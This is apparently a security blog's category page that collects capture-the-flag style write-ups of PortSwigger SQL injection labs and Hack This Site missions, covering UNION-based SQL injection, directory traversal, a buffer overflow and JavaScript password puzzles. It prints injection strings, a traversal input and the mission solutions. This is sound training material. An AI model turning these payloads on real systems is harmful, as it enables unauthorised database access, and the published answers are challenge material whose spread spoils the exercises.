Category: Web

HaXeZ – World Wide Web

The World Wide Web is one of our greatest achievements. It is up there with putting a person on the moon. The web is a vast resource of information, social interaction, recreation, and many other activities. It can also be a dangerous place where you can have your identity stolen, your bank accounts cleaned out, your computer infected and many other undesirable things. haXez is here to help you navigate your way through the World Wide Web securely by investigating the types of attacks that could cause you problems.

PortSwigger Web Security Academy: SQL injection 2

Posted on November 2, 2021November 2, 2021 by Jonobi Musashi

Hello friends and today HaXeZ is looking at the 2nd SQL Injection lab on Portswigger Web Security Academy. This lab requires you to take the UNION-based injection performed in the first lab, and extend it. Instead of just identifying the number of columns, we’re going to test which columns can hold text. In order to do this, we will use the same methodology for the first one but then replace one of the NULL values with a string.

SQL Injection UNION Attack, Finding a COlumn Containing Text

SQL Injection UNION Attack, Finding Columns With Text

As stated above, the purpose of this lab is to help you learn how to identify columns that contain text. The reason this is useful is that if you want to dump the contents of a database, then you need to dump it to a compatible column. This lab requires you to perform an injection attack with some text provided.

The Application

The application is similar to the ones we have already seen. The navigation menu at the top with products listed underneath. However, at the top we have a message that says, Make the database retrieve the string ‘zns2kh’ (it changes each time). In order to do this, we need to turn intercept on and click one of the links. This will allow us to work on one of the parameters to figure out the injection.

Intercept and Repeat

As you can see from the image below, I have intercepted the request with Burp and sent it to repeater. I have then identified how many columns there are using the ‘Accessories'+UNION+SELECT+NULL,NULL,NULL--‘ method until the application stops producing a 500 error. Then we need to repeat this process but this time we replace the ‘NULL‘ values with a string. In the example below, I have used ‘a’ to determine which columns hold text. As you can see from the results, the second column contains text as it returns a valid response instead of a 500 error.

The SQL Injection

In order to solve the lab, you need to replace the string ‘a’ with the string at the top of the page. In fact, you could do the whole lab with the required string instead of using string ‘a’ but I needed to pad out this write-up to hit the desired word count. Anyway, that’s the solution, I hope you found this useful.

paramter'+UNION+SELECT+NULL,'your-string',NULL--

PortSwigger Web Security Academy: SQL injection 1

Posted on November 1, 2021November 1, 2021 by Jonobi Musashi

Hello friends and thanks for coming to HaXeZ where today we’re looking at the first SQL injection lab on Portswigger Web Security Academy. In order to keep things simple, I will be doing the labs in the order that they apepars on the all-labs page. While this doesn’t make much sense from a difficulty perspective, it will help with keeping things in order.

SQL Injection UNION Attack

The first lab in the SQL Injection series is a UNION based attack that requires you to determine the number of columns returned by the query. While this is a pretty steep point of entry, I’m always one for jumping in the deep end and learning to swim. The instructions explain that we need to use a UNION based attack and that we will be building on this type of attack for future labs. There is a green button to access the lab.

Determining the number of columns returned by the query

The Application

Clicking the green button takes us to the application which appears to be a shop. Furthermore, the shop has a navigation menu at the top of the page and some products listed underneath it. We can make an educated case right away that there is going to be three columns. However, there could be hidden columns somewhere that are not visible on the page. First things first, in Burp Suite, turn Intercept on. Then click one of the links and navigate to Burp to see the captured request.

Repeating The Payload

By far the easist way to test out payloads in Brup Suite is to send them to repeater. Repeater alloows you to send, modify and send payloads without having to reintercept the request. You can send the orginal request to repeater by right clicking in the request and chosing send to repeater. When then need to test how many columns there are. In order to do this, insert a single quotation mark after the Accessories paramter. Then, input the following syntax '+UNION+SELECT NULL-- make sure to include the space after the double hyphens. When you send this payload, you should get a 500 error message which indicates there is an error in your SQL syntax. That’s good news.

SQL Injection - Repeater — SQL Injection – Repeater

The SQL Injection

With our first payload giving us an error, we can increase the number of NULL values we add to the injection. The number of NULL values needs to equal the amount of columns thus allowing us to determine how many collumns there are. So add another NULL, then another one untill you get the response shown in the picture above. You can then add the payload to your orginal request and forward it. You would have already completed the lab but it’s nice to see how the injection is displayed on the page. The correct synax is displayed below.

Accessories'+UNION+SELECT+NULL,NULL,NULL--

Burp Suite Certified Practitioner – Getting Started

Posted on November 1, 2021November 1, 2021 by Jonobi Musashi

Hello and welcome to HaXeZ, today we’re going to be talking about the Burp Suite Certified Practitioner certification. For those new to Cybersecurity, you may not know that Burp Suite is probably the best web testing tools available. You may also not know that Portswigger (the parent company) offers certification for Burp Suite. Furthermore, you may also not know that the exam to get the certificate is currently only $99! Additionally, if you pass it before December 10th, 2021, they will refund you!!!

Burp Wait, Theres More

The Burp Suite application requires an annual license fee (around $300) for the professional version. The professional version is required to pass the exam. However, you can register and download a 30-day free trial to practice with and take the exam. You don’t need to provide any credit card information, just sign up and download the client. If you have some spare time, then 30 days should be plenty to get through the exam (I hope).

Portswigger Web Security Academy

Did I mention that their academy is completely free to access? All of the resources that you need to learn to pass the exam are on their website. Furthermore, it even includes a progress tracker to show how far you have come since starting. It has articles on each vulnerability and then labs to practice attacking those vulnerabilities. Completing the lab will add progress to your learning progress.

Learning Paths

There are three distinct learning paths, Server-Side Topics, Client-Side Topics, and Advanced Topics. These topics are then broken down into different sections covering different vulnerabilities. For example, the first recommended learning path is Server-Side Topics and covers topics like SQL injection, XXE Injection, and Command Injection.

The Client-Side Topic has various modules including Cross-Site Scripting, Cross-Site Request Forgery, and Clickjacking. This module covers everything that can be exploited from clientside in the browser.

Finally, the advanced topics cover areas like insecure deserialization, server-side template injection, and web cache poisoning. There are a total of 21 modules. However, the modules vary in size so you could complete a couple of modules a day.

Wish me luck as I begin my BSCP journey.

Hack This Site: Extended Basic – Mission 2

Posted on October 29, 2021October 29, 2021 by Jonobi Musashi

Hello friend and welcome to HaXeZ where we will be covering Hack This Site Extended Basic Mission 2. This challenge is fairly simple provided you have an understanding of application structures. It requires us to slightly modify the provided script in order to access the index.php page at the root of the web application. In order to do that we need to perform a directory traversal up two directories to grab the index.html page.

The Function

As you can see from the screenshot below, we have some fairly basic PHP code that is attempting to get the contents of the filename specified by the value ‘filename‘. Furthermore, it specifies the type of extension for the filename which in this case is ‘.php‘. Underneath the code, we have a submission box where we need to submit the solution to the challenge.

The Solution

Given these points, all we need to do to solve this mission is to tell the script to navigate up two directories. We are currently in the ‘extbasic‘ directory looking at the file named 2 ‘/missions/extbasic/2‘. So by traversing up two directories we should be in the root directory. Once there, we need to specify the ‘index.php‘, however the file extension ‘.php‘ has already been appended for us so we only need to specify the word index. The correct solution should be ‘../../index‘. Paste that into the check form and you should complete the mission and be able to proceed on to the next one.

Extended Basic Mission 2 – Conclusion

This is a simple but fun challenge that tests your knowledge of web application directory structures and code reading ability. While I wouldn’t have a clue how to write this off the top of my head, I easily worked out what the code is attempting to do. Once you understand what the code is doing, and you understand the rules of the mission then it’s fairly simple. This type of attack is known as a directory traversal attack and can be prevented by validating user input and by having strict permissions policies on directories. Anyway, I hope this helped you solve the mission.

Hack This Site: Extended Basic – Mission 1

Posted on October 27, 2021October 27, 2021 by Jonobi Musashi

Hello and welcome to HaXeZ where today we’re looking at Hack This Site Extended Basic Mission 1. The mission is titled “Over and Over?” and requires you to perform a buffer overflow to complete it. Upon navigating to the mission we are greeted with a message that explains that we have a C program that calculates the length of the user input. It goes on to explain that we need to crash the program. It also provides us with the source code of the application.

Mission 1 – Source Code

I’m not going to pretend I know the ins and outs of the C programming language. It was a bit before my time so I’ve never learned it. However, If we look at the source code we can see that it is declaring a standalone function using the void statement. Furthermore, we can deduce that there is a character limit of 200 hundred characters as stated with the ‘char lol [200]‘ line. Taking this into consideration, we can safely assume that inputting more than 200 characters would likely cause an error.

Extended Basic Mission 1 - Application Source Code — Extended Basic Mission 1 – Application Source Code

Mission 1 – Buffer Overflow

A buffer overflow occurs when you send more data than is expected to an application. Essentially, each part of a program has an allocated amount of system memory. If you were to send more data to the application than the application has allocated memory for, unexpected results happen. This will likely cause the application to crash but in some cases, it could allow for code execution. However, the purpose of this mission is to crash the application. We know the application is expecting 200 characters. So if we generate 250 characters with our terminal using ‘printf 'A%.0s' {1..250}‘ and submit it to the application, we should crash it.

Mission Complete

Now if we copy and paste that string into the application submission box and click submit, we should see it process and complete the mission. We can tell the mission is complete because it should generate a blue Go On button underneath the input form.

Hack This Site: Javascript Mission – Level 7

Posted on October 26, 2021October 26, 2021 by Jonobi Musashi

Well done friends of HaXeZ, We have done it, we have made it to the last Javascript mission on Hack This Site. After all those other missions I feel like I’m a scripting savant. Ok maybe not, but progress is progress. Furthermore, once we have completed this mission, we can move on to other more exciting missions. This mission is a lot like one of the previous missions that we did. However, instead of the password being encoded or obfuscated, this time the whole script is obfuscated.

Introduction

Navigating to the mission we can see a password input form. There isn’t much more information than that other than the title and a thank you message to the creator. If we submit test data to the password input form then we will get an incorrect error message. In order to see what’s going on, we need to view the page source of the application.

The Javascript

As you can see from the image below, the script appears to be garbled data. It’s all X’s followed by two-digit numbers. We could attempt to decode it online but there is a far easier solution. All we need to do is to right-click the Check Password button and inspect the functionality behind that.

The Button Javascript

As you can see from the screenshot below, inspecting the button shows us the Javascript that is powering it. The Javascript is checking the value of user-submitted value ‘pass‘ to see whether it matches the value ‘j00w1n‘. If the values match then we get an alert saying “You WIN!”. If it doesn’t match then we get a message saying “WRONG! Try Again”.

The Solution

Therefore, in order to complete this mission and to complete the Javascript series. All you need to do is submit the value ‘j00w1n‘ to the password form. As you can see from the image below, we get the alert box that tells us that we have successfully completed the mission.

Alernative Method

I’m sure the developers didn’t intend for this mission to be this easy. I fully believe that they wanted us to deobfuscate the code. So for that reason, the screenshot below shows me deobfuscating the code using the GCHQ tool CyberChef. As you can see from the screenshot, the output shows the button value with the password.

Hack This Site: Javascript Mission – Level 6

Posted on October 25, 2021October 25, 2021 by Jonobi Musashi

Introduction

Hello friends and welcome to HaXeZ, today we’re going to solve Javascript Mission 6 on Hack This Site. This challenge isn’t too difficult provided you pay attention to the details. The mission takes the script from a previous mission and attempts to distract you with it. However, hidden on another page of the application is the correct script that is being used to authenticate.

The Mission

Navigating to the mission we see the expected password submission form. However, instead of Faith, this time we have a message saying that Fiftysixer has decided to try creating some Javascript. It explains that he forgot to remove the previous code. This has made the new code more confusing but apparently, Fiftysixer likes it that way. We can submit test data to the form but we get an incorrect error message.

The Javascript

If we view the Javascript we can see that it looks a lot like the script we had for a previous mission. This script tried to trick us by comparing a variable with a string rather than assigning the string to the variable. The solution to that mission was ‘moo'. However, if we submit ‘moo‘ to the password form, we still get an incorrect error message. Notably, there is a link to what appears to be another Javascript file called checkpass.js. Furthermore, the name suggests that it may have something to do with the password checking functionality.

The Real Javascript

If we navigate to the script in the URL we can see that it does appear to be the correct script for checking the password. As you can see from the image below, the javascript is declaring three variables and assigning them values.

dairycow="moo";
moo = "pwns";
rawr = "moo";

I’m not too familiar with Javascript syntax but I wonder whether the lack of spaces in the declaration of ‘dairycow‘ is significant in any way. After the variable declaration, we have a function to check the password. It states that if the value submitted by the user is the same as the value of ‘rawr‘ and ‘moo‘ then we win. If not then we lose. It is important to note that there are also speech marks between ‘rawr‘ and ‘moo‘ so we need to ensure that we have a space in our submission.

The Solution

So that’s all we need to do to solve the mission. Submit ‘moo pwns‘ as the password and you should complete the mission. Congratulations.

Hack This Site: Javascript Mission – Level 5

Posted on October 23, 2021October 23, 2021 by Jonobi Musashi

Introduction

Hello World Wide Web and welcome to HaXeZ where today we will be looking at the Javascript Mission 5 on Hack This Site. This mission was a lot of fun and even gave me an excuse to use the GCHQ CyberChef tool to deobfuscate some encoded text. The mission is fairly simple provided you know what to do with the data that you find.

The Mission

Upon navigating to the mission we are greeted with a password input form and some text asking if Faith spelled Runescape wrong. This comes into play a bit later as it is referencing a Javascript function that is used to encode or decode text. We could input some text into the password form and submit it but without the correct text, we will get an error message to notify us that the password is wrong.

The Javascript

However, If we inspect the password form or view the page source we can see the Javascript. Furthermore, the first part of the script is declaring a variable named ‘moo‘ and says that it is equal to unescape. The ‘unescape()‘ function computes a new string in which hexadecimal escape sequences are replaced with the character that it represents. In addition to the declaration of the ‘moo‘ variable and the ‘unescape’ function we have the following encoded string ‘%69%6C%6F%76%65%6D%6F%6F‘.

Javascript Deobfuscation

In order to decode the string, we can use our favorite Government developed decoding tool, CyberChef. Surprisingly, CyberChef works really well considering it came from the public sector (please don’t arrest me). As can be seen from the image below, the interface is simple. You choose a recipe, then paste in your encoded text, and then it works its magic and decodes it for you. It even has a magic recipe that will automatically detect what you’re inputting. It really is a great application.

The Solution

As shown above, the decoded text turns out to be ‘ilovemoo‘. If you submit that to the password form then you should complete the mission.

Congratulations you have now completed Javascript mission 5.

Hack This Site: Javascript Mission – Level 4

Posted on October 22, 2021October 22, 2021 by Jonobi Musashi

Introduction

Hello there internet and welcome to HaXeZ where today we will be solving Hack This Site Javascript Mission 4. This mission is a little deceptive due to the way that the Javascript is written. To put it another way, this mission intentionally tries to trick you into thinking the value of a variable is something else. However, our keen attention to detail is enough to complete the mission.

The Mission

The mission is called Var which we can deduce means we’re going to be working with variables again. As can be seen from the image below, the message reads “Faith is trying to trick you… she knows that you’re tired after all the math works”. To sum up, Faith is going to going to attempt some shinanigans to prevent us from completing this mission. We can test the form with random data to see what happens but as expected, we just get an alert informing us that it is incorrect.

The Javascript

If we inspect the page we can see the script that is powering the functionality. This is where the first deception comes in. If you view the page source instead of inspecting the element, you may not notice that the first variable is being set. The image below shows that the first variable is being set on the far right. It’s probably a bit to small to see though.

Hidden moo

However, if we inspect the script you will see that at the very start of the script, we can see that the value ‘moo‘ is being assigned to the variable ‘RawrRawr‘. Next, we can see that a function called ‘x‘ is being created where the value of ‘hack_this_site‘ is being added to the variable ‘+RawrRawr+‘. Then again, perhaps it isn’t. If we look at how the ‘moo‘ is being assigned to ‘RawrRawr‘ we only see one equal sign. In javascript, a double equals sign acts as an operator to compare two values so all that’s happening here is that ‘hack_this_site‘ is being compared to ‘RawrRawr‘.

The Solution

The value of ‘RawrRawr‘ is still moo, let’s see what the script does next. The script has an if statement that compares ‘x‘ to an empty value between two speech marks plus the value of ‘RawrRawr‘. So in essence, the script is checking the value of ‘x‘ against nothing plus ‘moo‘ as ‘moo‘ was set earlier. Therefore, the password to complete the mission should be moo. Input that in to the box and click submit to score.

Hack This Site: Javascript Mission – Level 3

Posted on October 21, 2021October 23, 2021 by Jonobi Musashi

Introduction

Hello Internet, welcome to HaXeZ where today we’re going to be solving the 3rd Javascript mission on Hack This Site. Judge me how you will but I have to admit that I learned a lot from this challenge. My time at school was less than ideal so I didn’t go very often. Unfortunately, this meant I missed out on a lot of important subjects including mathematics. I hadn’t even heard of BODMAS until today and I’m 35. I have no idea how I’ve made it this far in computing without knowing it. This challenge is fairly simple provided you know how variables work and know maths.

The Javascript

Looking at the code below we can see that we need to submit a password that is the same length as the value of the variable ‘moo‘. We know this because of the if statement that requires ‘x.length == moo‘ for us to get the alert that we have won the mission. In order to get the value of ‘moo‘, we need to perform some calculations to work out the value.

The Mathamatics

Ok, let’s break down the maths.

The value of ‘foo‘ is 47 Because of the BODMAS calculation 6 * 7 + 5.

The value of ‘bar‘ is 7 Because it’s the Modulus remainder of 47 divided by 8

Therefore, the value of ‘moo‘ is 14 because the value of ‘bar‘ is 7 and the value of ‘moo‘ is ‘bar‘ * 2.

We can discard the value of ‘rar‘ because ‘rar‘ is not used anywhere during the calculation. Therefore, we are left with the value 14. We know that the password submission form requires our input to be the same length as ‘moo‘. In essence, we should be able to submit any 14 characters to complete the mission.

Congratulations

After submitting 14 characters to the password submission form, you should complete the challenge. That’s all there is to it. However, if you don’t know about BODMAS, which I didn’t, and if you didn’t know that a percentage sign in programming means Modulo or remainder then it could be difficult.